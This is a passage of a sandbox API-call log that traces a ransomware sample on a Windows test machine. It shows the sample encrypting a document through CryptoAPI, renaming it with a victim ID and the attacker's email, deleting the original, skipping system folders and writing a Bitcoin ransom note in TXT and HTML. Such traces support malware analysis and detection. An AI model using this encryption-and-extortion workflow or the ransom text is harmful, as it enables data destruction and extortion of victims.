g.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ppt") returned=".ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.496] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.496] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.496] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0188.501] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xefac, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xefac, lpOverlapped=0x0) returned 1
	[0188.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.512] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb198) returned 1
	[0188.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.514] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0188.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.515] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.515] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb8f70) returned 1
	[0188.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.515] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xefac, dwBufLen=0xefac | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xefb0) returned 1
	[0188.517] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.518] RtlMoveMemory (in: Destination=0xfec138, Source=0xfdd180, Length=0xefac | out: Destination=0xfec138) 
	[0188.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.524] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfec138*, pdwDataLen=0x18aefc*=0xefac, dwBufLen=0xefb0 | out: pbData=0xfec138*, pdwDataLen=0x18aefc*=0xefb0) returned 1
	[0188.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.525] CryptDestroyKey (hKey=0xfb8f70) returned 1
	[0188.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.525] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0188.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.525] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0188.525] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.526] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.526] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0188.527] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 108
	[0188.528] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.528] WriteFile (in: hFile=0x388, lpBuffer=0xfec138*, nNumberOfBytesToWrite=0xefb0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfec138*, lpNumberOfBytesWritten=0x18b358*=0xefb0, lpOverlapped=0x0) returned 1
	[0188.540] CloseHandle (hObject=0x388) returned 1
	[0188.540] CloseHandle (hObject=0x2c0) returned 1
	[0188.540] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt")) returned 1
	[0188.548] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt")) returned 0
	[0188.548] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58407120, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0xc73be0c0, ftLastAccessTime.dwHighDateTime=0x1d96cb9, ftLastWriteTime.dwLowDateTime=0xc73be0c0, ftLastWriteTime.dwHighDateTime=0x1d96cb9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZRxhjZssJTmtcBLglvy", cAlternateFileName="ZRXHJZ~1")) returned 1
	[0188.548] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58407120, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0xc73be0c0, ftLastAccessTime.dwHighDateTime=0x1d96cb9, ftLastWriteTime.dwLowDateTime=0xc73be0c0, ftLastWriteTime.dwHighDateTime=0x1d96cb9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZRxhjZssJTmtcBLglvy", cAlternateFileName="ZRXHJZ~1")) returned 0
	[0188.549] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0188.549] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0188.556] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St"
	[0188.556] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\*.*"
	[0188.556] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.557] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.557] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\HELP_DECRYPT_YOUR_FILES.TXT") returned 79
	[0188.557] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0188.558] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0188.558] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0188.577] CloseHandle (hObject=0x384) returned 1
	[0188.577] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.578] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.578] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0188.580] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0188.580] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0188.580] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0188.586] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0188.586] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0188.587] CloseHandle (hObject=0x384) returned 1
	[0188.587] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.587] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.588] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0188.588] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\HELP_DECRYPT_YOUR_FILES.HTML") returned 80
	[0188.588] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0188.590] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0188.590] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0188.593] CloseHandle (hObject=0x384) returned 1
	[0188.594] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.594] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.595] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.595] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0188.596] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0188.596] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0188.597] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0188.597] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0188.602] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0188.602] CloseHandle (hObject=0x384) returned 1
	[0188.603] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3cc7350, ftCreationTime.dwHighDateTime=0x1d97311, ftLastAccessTime.dwLowDateTime=0x89e8c681, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89efefa9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0188.603] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\*.*") returned 55
	[0188.603] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.603] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*") returned 0x37
	[0188.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.604] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="windows") returned 0x0
	[0188.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.604] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="boot") returned 0x0
	[0188.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.604] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="system volume information") returned 0x0
	[0188.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0188.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="temp") returned 0x0
	[0188.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="program files") returned 0x0
	[0188.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="program files (x86)") returned 0x0
	[0188.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="appdata") returned 0x0
	[0188.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="application data") returned 0x0
	[0188.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.607] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="winnt") returned 0x0
	[0188.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.607] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="tmp") returned 0x0
	[0188.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
